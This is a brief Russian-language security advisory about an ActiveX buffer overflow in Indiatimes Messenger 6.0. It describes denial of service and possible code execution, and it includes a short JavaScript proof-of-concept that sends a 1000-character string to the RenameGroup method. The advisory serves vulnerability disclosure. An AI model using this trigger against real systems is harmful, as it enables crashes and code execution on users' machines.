Программа: Indiatimes Messenger 6.0
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании приложения и выполнить произвольный код на целевой системе.
Злоумышленник может создать специально сформированный сценарий и аварийно завершить работу приложения.
Удаленный пользователь может перезаписать ECX и EDI регистры и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение.
Эксплоит:
[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); //wait till login
obj1.RenameGroup("Friends", buf, 5);
[/script]